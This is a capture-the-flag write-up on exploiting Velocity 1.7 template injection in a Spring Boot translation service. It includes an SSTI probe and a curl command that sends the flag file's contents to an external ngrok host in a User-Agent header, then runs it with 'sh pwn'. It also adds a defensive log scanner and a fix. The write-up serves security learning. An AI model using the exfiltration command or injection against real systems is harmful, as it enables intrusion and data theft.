Labyrinth Linguist Writeup
Cyber Apocalypse 2024
Solved by : thewhiteh4t
- In this challenge we have a translation service
- Upon inspecting the source files we noticed a few things :
    - the flag file name is partially randomized in entrypoint.sh :
    mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt
- In pom.xml we can see the dependencies and their version information :
<parent>
  <groupId>org.springframework.boot</groupId>
  <artifactId>spring-boot-starter-parent</artifactId>
  <version>1.5.10.RELEASE</version>
</parent>
<dependencies>
  <dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
  </dependency>
  <dependency>
    <groupId>org.apache.velocity</groupId>
    <artifactId>velocity</artifactId>
    <version>1.7</version>
  </dependency>
</dependencies>
- Velocity v1.7 is vulnerable to Server-Side Template Injection (SSTI) when user input is rendered as a template
- References :
    - https://antgarsil.github.io/posts/velocity/
    - https://iwconnect.com/apache-velocity-server-side-template-injection/
- Based on the PoC in the references above we ran the test case below ; if the input is evaluated as a template, $run renders as 2 in the response
#set ($run=1 + 1) $run

- RCE was blind because we had no output of the commands, so we used ngrok to get a callback to confirm whether the payload was working
- Then we tried reverse shells but none of them worked for some reason, so to simplify things we made the target download a file instead
- And since the command output was not visible, we used web requests to exfiltrate the flag by setting a custom User-Agent in the curl command :
> cat pwn
curl "https://f084-116-74-26-67.ngrok-free.app/special" -H "User-Agent: $(cat /flag*)"

- After sending the file we sent a second request to run it using : sh pwn
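From the defender's side, both steps above leave a signature in the application's request log: the SSTI probe carries Velocity directive syntax (#set, $reference) in a field that should only ever contain natural-language text, and the exfiltration hides data in a User-Agent header that does not look like any client's product token. The scanner below is an added example written for this writeup, not code from the challenge or the references; the log format and the sample lines are constructed, and the two heuristics (Velocity syntax in the "text" parameter, User-Agent without a product/version lead token) are my own choices, not a rule taken from the page.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of the app's request log (not a real capture). Each line
# carries the method, path, the user-supplied "text" parameter as the browser
# URL-encoded it, and the User-Agent header.
SAMPLE_LOG = """\
POST /  text=hello+world  ua="Mozilla/5.0 (X11; Linux x86_64)"
POST /  text=%23set+%28%24run%3D1+%2B+1%29+%24run  ua="Mozilla/5.0 (X11; Linux x86_64)"
GET /special  text=  ua="HTB{constructed_sample_flag}"
GET /  text=  ua="curl/8.5.0"
"""

LINE_RE = re.compile(r'^(\w+)\s+(\S+)\s+text=(\S*)\s+ua="([^"]*)"$')

# Velocity syntax that should never appear in a string a user submits for
# translation: a directive such as the "#set (...)" probe above, or a
# "$reference" that the engine would try to resolve against the context.
# Heuristic: a literal like "$USD" in ordinary text will also be flagged.
VELOCITY_DIRECTIVE = re.compile(
    r"#\s*(set|foreach|if|elseif|evaluate|parse|include|macro|define)\s*\("
)
VELOCITY_REFERENCE = re.compile(r"\$!?\{?[A-Za-z_]\w*")

# A normal User-Agent begins with a product/version token ("Mozilla/5.0",
# "curl/8.5.0"). A value that does not is worth a look: data smuggled out in
# this header, as in the curl command above, rarely follows that shape.
PRODUCT_TOKEN = re.compile(r"^[A-Za-z][\w.\-]*/\d")


def parse_line(line: str) -> dict:
    """Split one constructed log line into its fields, URL-decoding the text."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised log line: {line!r}")
    method, path, raw_text, ua = m.groups()
    return {"method": method, "path": path, "text": unquote_plus(raw_text), "ua": ua}


def has_velocity_syntax(text: str) -> bool:
    """True if the decoded user input contains Velocity directives or references."""
    return bool(VELOCITY_DIRECTIVE.search(text) or VELOCITY_REFERENCE.search(text))


def looks_like_exfil_user_agent(ua: str) -> bool:
    """True if a non-empty User-Agent lacks the usual product/version lead token."""
    return ua != "" and not PRODUCT_TOKEN.match(ua)


def scan(log_text: str) -> list:
    """Return (line_number, reason) for every request that needs attention."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        req = parse_line(line)
        if has_velocity_syntax(req["text"]):
            findings.append((n, "velocity-syntax-in-input"))
        if looks_like_exfil_user_agent(req["ua"]):
            findings.append((n, "suspicious-user-agent"))
    return findings


if __name__ == "__main__":
    for n, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

On the constructed sample, line 2 (the decoded #set probe) and line 3 (the flag-shaped User-Agent) are reported; the two ordinary browser and curl requests are not. The underlying fix is in the application rather than the log: user input belongs in the VelocityContext as a value, never spliced into the template string that the engine evaluates.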

- Web logs in ngrok dashboard :

